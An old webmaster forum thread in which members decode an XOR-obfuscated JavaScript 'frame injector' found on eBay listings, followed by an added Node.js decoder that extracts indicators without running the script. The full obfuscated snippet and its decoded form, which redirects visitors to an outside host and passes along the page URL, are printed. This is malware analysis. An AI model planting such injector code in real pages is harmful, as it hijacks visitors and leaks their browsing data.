Can anyone crack it?


dacialogan12

5:29 pm on Dec 11, 2009 (gmt 0)

10+ Year Member



Can anyone crack it?

<script>var enkripsi="'1Aqapkrv'1Gtcp'02awppglvWPN'1Fuklfmu,nmacvkml'1@kd'0:awppglvWPN,jmqvlcog'1F'1F'05aek,g`c{,am,wi'05'0;'5@uklfmu,rcpglv,nmacvkml,pgrncag'0:'05jvvr'1C--crk,cwavktkcdncqj,amo-egvdncqj0,rjr'1Dfgqa'1F'05)uklfmu,nmacvkml)'05'04f'1F3'05'0;'5Fgnqg'5@kd'0:awppglvWPN,jmqvlcog'1F'1F'05tk,g`c{fgqa,am,wi'05'0;'5@uklfmu,rcpglv,nmacvkml,pgrncag'0:'05jvvr'1C--crk,cwavktkcdncqj,amo-egvdncqj0,rjr'1Dfgqa'1F'05)uklfmu,nmacvkml)'05'04f'1F0'05'0;'5Fkd'0:awppglvWPN,jmqvlcog'1F'1F'05nmacnjmqv'05'0;'5@uklfmu,rcpglv,nmacvkml,pgrncag'0:'05jvvr'1C--crk,cwavktkcdncqj,amo-egvdncqj0,rjr'1Dfgqa'1F'05)uklfmu,nmacvkml)'05'04f'1F1'05'0;'5F'5F'1A-qapkrv'1G"; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i<panjang;i++){ teks+=String.fromCharCode(enkripsi.charCodeAt(i)^2) }teksasli=unescape(teks);document.write(teksasli);</script>

Fotiman

7:04 pm on Dec 11, 2009 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



This is how most frame injector code works. To better understand what it's doing, start by "beautifying" the code to make it easier to read and work with (a search for javascript beautifier will yield some results).

You will notice that this piece of code contains 1 really long string variable (enkripsi), and 3 more variables (teks, teksasli, and panjang). The code examines each character of enkripsi to generate another string which gets stored in teks. teksasli then gets the unescaped value of teks, and then it does a document.write of teksasli.

The document.write portion is where you want to focus your attention. To see what this is outputting to your page, you can simply add an alert before the document.write:

alert(teksasli);

This will show you what that bit of script is doing.

dacialogan12

11:11 pm on Dec 11, 2009 (gmt 0)

10+ Year Member



Thank you very much!
But please help me, I do not know how to do it. I am a beginner in this area and I have knowledge.
I would be very grateful if you help me to decode this script and if you explain to me what it does or can do, if it is placed on a website.
Thank you once again and wait for your answer.

astupidname

12:19 am on Dec 12, 2009 (gmt 0)

10+ Year Member



As Fotiman told you, once you expand that code a bit it becomes this (enkripsi is one long string -careful not to break it!):
<script>
var enkripsi = "'1Aqapkrv'1Gtcp'02awppglvWPN'1Fuklfmu,nmacvkml'1@kd'0:awppglvWPN,jmqvlcog'1F'1F'05aek,g`c{,am,wi'05'0;'5@uklfmu,rcpglv,nmacvkml,pgrncag'0:'05jvvr'1C--crk,cwavktkcdncqj,amo-egvdncqj0,rjr'1Dfgqa'1F'05)uklfmu,nmacvkml)'05'04f'1F3'05'0;'5Fgnqg'5@kd'0:awppglvWPN,jmqvlcog'1F'1F'05tk,g`c{fgqa,am,wi'05'0;'5@uklfmu,rcpglv,nmacvkml,pgrncag'0:'05jvvr'1C--crk,cwavktkcdncqj,amo-egvdncqj0,rjr'1Dfgqa'1F'05)uklfmu,nmacvkml)'05'04f'1F0'05'0;'5Fkd'0:awppglvWPN,jmqvlcog'1F'1F'05nmacnjmqv'05'0;'5@uklfmu,rcpglv,nmacvkml,pgrncag'0:'05jvvr'1C--crk,cwavktkcdncqj,amo-egvdncqj0,rjr'1Dfgqa'1F'05)uklfmu,nmacvkml)'05'04f'1F1'05'0;'5F'5F'1A-qapkrv'1G";

teks = "";
teksasli = "";
var panjang;
panjang = enkripsi.length;
for (i = 0; i < panjang; i++) {
    teks += String.fromCharCode(enkripsi.charCodeAt(i) ^ 2);
}
teksasli = unescape(teks);
alert(teksasli);
//document.write(teksasli);
</script>

Note I commented out the document.write there and added an alert of teksasli variable before the document.write instead, so if you place that on a page it will alert the decrypted version of the enkripsi variable. The resulting alert gives the following (I decompressed and reformatted from alert somewhat, for visibility):

<script>
var currentURL = window.location;
if (currentURL.hostname == 'cgi.ebay.co.uk') {
    window.parent.location.replace('http://api.auctiviaflash.com/getflash2.php?desc=' + window.location + '&d=1');
} else {
    if (currentURL.hostname == 'vi.ebaydesc.co.uk') {
        window.parent.location.replace('http://api.auctiviaflash.com/getflash2.php?desc=' + window.location + '&d=2');
    }
    if (currentURL.hostname == 'localhost') {
        window.parent.location.replace('http://api.auctiviaflash.com/getflash2.php?desc=' + window.location + '&d=3');
    }
}
</script>

So you may see, the original script does a document.write of another script which contains code which basically does a redirect of the user to a different page and captures the user's current location and passes it along in the url variables sent to the page you are re-directed to.
Note also how totally stupid the encryption is. Original code was 846 characters (compressed), the code it actually uses is 496 characters (compressed) and easily decrypted - makes no sense to me to try and encrypt it using standard javascript functionality, in an attempt to obfuscate the code, and bloating the code by over 70% in the process.
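
Added example, not part of any post in this thread: a Node.js decoder that treats the blob as text only, recovers the XOR key by brute force (a generalization of the fixed key 2 used in the thread), and lists the hostnames and URLs in the decoded script without rendering it in a browser. `SAMPLE` is the first branch of the `enkripsi` string above, truncated after its first closing brace; the function names are this example's own.

```javascript
// Added example (not from the thread). Run with Node.js: the blob is decoded
// as text only and is never passed to document.write or eval.

// First branch of the thread's `enkripsi` string, truncated after the first "}".
const SAMPLE = "'1Aqapkrv'1Gtcp'02awppglvWPN'1Fuklfmu,nmacvkml'1@kd'0:awppglvWPN,jmqvlcog'1F'1F'05aek,g`c{,am,wi'05'0;'5@uklfmu,rcpglv,nmacvkml,pgrncag'0:'05jvvr'1C--crk,cwavktkcdncqj,amo-egvdncqj0,rjr'1Dfgqa'1F'05)uklfmu,nmacvkml)'05'04f'1F3'05'0;'5F";

// XOR every UTF-16 code unit with a one-byte key, as the dropper's loop does.
function xorString(s, key) {
  let out = "";
  for (let i = 0; i < s.length; i++) {
    out += String.fromCharCode(s.charCodeAt(i) ^ key);
  }
  return out;
}

// Generalization: try all 255 keys and keep the one whose output contains
// a percent-escaped "<script" marker.
function findKey(blob) {
  for (let key = 1; key < 256; key++) {
    if (/%3Cscript/i.test(xorString(blob, key))) return key;
  }
  return null;
}

// Decode without executing. unescape() is deprecated but mirrors the dropper.
function decode(blob) {
  const key = findKey(blob);
  if (key === null) throw new Error("no single-byte XOR key yields %3Cscript");
  return { key, script: unescape(xorString(blob, key)) };
}

// Extract the hostnames the script tests for and the URLs it references.
function indicators(script) {
  const hosts = [...script.matchAll(/hostname\s*==\s*'([^']+)'/g)].map(m => m[1]);
  const urls = script.match(/https?:\/\/[^\s'"<>]+/g) || [];
  return { hosts, urls };
}

const result = decode(SAMPLE);
console.log("key:", result.key);
console.log(result.script);
console.log(indicators(result.script));
```
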